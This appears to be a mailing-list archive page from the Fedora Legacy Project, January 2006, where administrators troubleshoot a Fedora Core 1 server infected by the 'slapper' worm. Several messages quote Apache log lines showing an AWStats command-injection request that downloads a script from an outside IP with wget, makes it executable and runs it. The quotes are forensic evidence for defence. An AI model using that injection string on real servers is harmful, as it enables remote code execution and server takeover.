On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
More generally, I read advice somewhere that mounting /tmp with the
noexec option (and making any other temp directories symbolic
links to that one) can make this type of attack much more difficult.
This doesn't really prevent execution
Hi Peter,
On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
More generally, I read advice somewhere that mounting /tmp with the
noexec option (and making any other temp directories symbolic
links to that one) can make this type of attack much more difficult.
This doesn't really
On 2006-01-24 22:13:26 +1000, Michael Mansour wrote:
Hi Peter,
On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
Definately noted as one of the measures to stop this type of attack, but
for
this particular server, /tmp is not a mounted filesystem but part of /,
so I
can't
Michael Mansour wrote:
Hi Marc,
On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
No I'm not sure. Reading through the link above, it does seem that you've hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jesse Keating wrote:
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
My version takes care of the mod_ssl issue he already disabled. FC1
doesn't have a fix or if so it hasn't gone through QA yet.
Do you have a CVE for the ssl issue? I'd
James Kosin wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jesse Keating wrote:
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
My version takes care of the mod_ssl issue he already disabled. FC1
doesn't have a fix or if so it hasn't gone through QA yet.
Do you have a CVE
On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
I'm a little shocked at this, frankly. I Googled around, and
found mentions of the Slapper going back to 2002. Why is it that
this exploit (and variations of it) haven't all been stamped
out years ago?
Read the link I posted yesterday,
On Tue, 2006-01-24 at 13:20 -0600, Mike Klinke wrote:
On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
I'm a little shocked at this, frankly. I Googled around, and
found mentions of the Slapper going back to 2002. Why is it that
this exploit (and variations of it) haven't all been
Mike McCarty wrote:
Gene Heskett wrote:
On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
I'm a little shocked at this, frankly. I Googled around, and
found mentions of the Slapper going back to 2002. Why is it that
this exploit (and
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Mike McCarty wrote:
--snip--
$ ps -A | grep pache
$ ps -A | grep ssl
doesn't show anything, so Apache isn't running, and I guess
SSL isn't either.
Mike
Mike,
ps -A | grep httpd /* Apache is only the name of the server
Hi Mike,
You should do a netstat -na | grep SYN, if you see alot of those then
slapper is there DOS attacking people.
$ netstat -na | grep SYN
$
Thanks for the advice. But, as I am behind a stealth firewall,
I feel relatively secured against *this* type of attack.
Umm, what does
On Tuesday 24 January 2006 14:00, Gene Heskett wrote:
If this file mentioned on the site doesn't exist on any of my
systems, is it safe to assume relative safety against this
attack?
As Michael Mansour discovered, he had this file on only one of three
FC1 machines after he installed Drupal,
of the Fedora Legacy Project
fedora-legacy-list@redhat.com
To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com
Subject: Re: slapper worm
Date: Tue, 24 Jan 2006 13:08:52 -0600
James Kosin wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jesse Keating wrote:
On Mon, 2006-01-23
On Tuesday 24 January 2006 15:18, Mike McCarty wrote:
Gene Heskett wrote:
On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
I'm a little shocked at this, frankly. I Googled around, and
found mentions of the Slapper going back to 2002. Why
On Tuesday 24 January 2006 15:29, Mike McCarty wrote:
Mike McCarty wrote:
Gene Heskett wrote:
On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
I'm a little shocked at this, frankly. I Googled around, and
found mentions of the Slapper
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how
Hi James,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and
then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1,
On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote:
Michael,
Try my version of httpd here:
http://support.intcomgrp.com/~jkosin
It has been effective against the worm so far.
James, what is in your package that we haven't included in our Apache?
I was under the assumption that we had
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1
403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jesse Keating wrote:
James, what is in your package that we haven't included in our Apache?
I was under the assumption that we had fixed all the CVEs related to the
slapper worm and that our users were safe. If this isn't the case, we
have a
Hi Kelson,
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1
403 344 - Mozilla/4.0
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
My version takes care of the mod_ssl issue he already disabled. FC1
doesn't have a fix or if so it hasn't gone through QA yet.
Do you have a CVE for the ssl issue? I'd like to see if it is somewhere
in the QA pipeline.
--
Jesse
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php are you running?
Marc.
Hi Marc,
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php are
Hi Marc,
On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
No I'm not sure. Reading through the link above, it does seem that you've
hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when the 3rd one was). The FC1
On Monday 23 January 2006 14:32, Michael Mansour wrote:
403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
26 matches
Mail list logo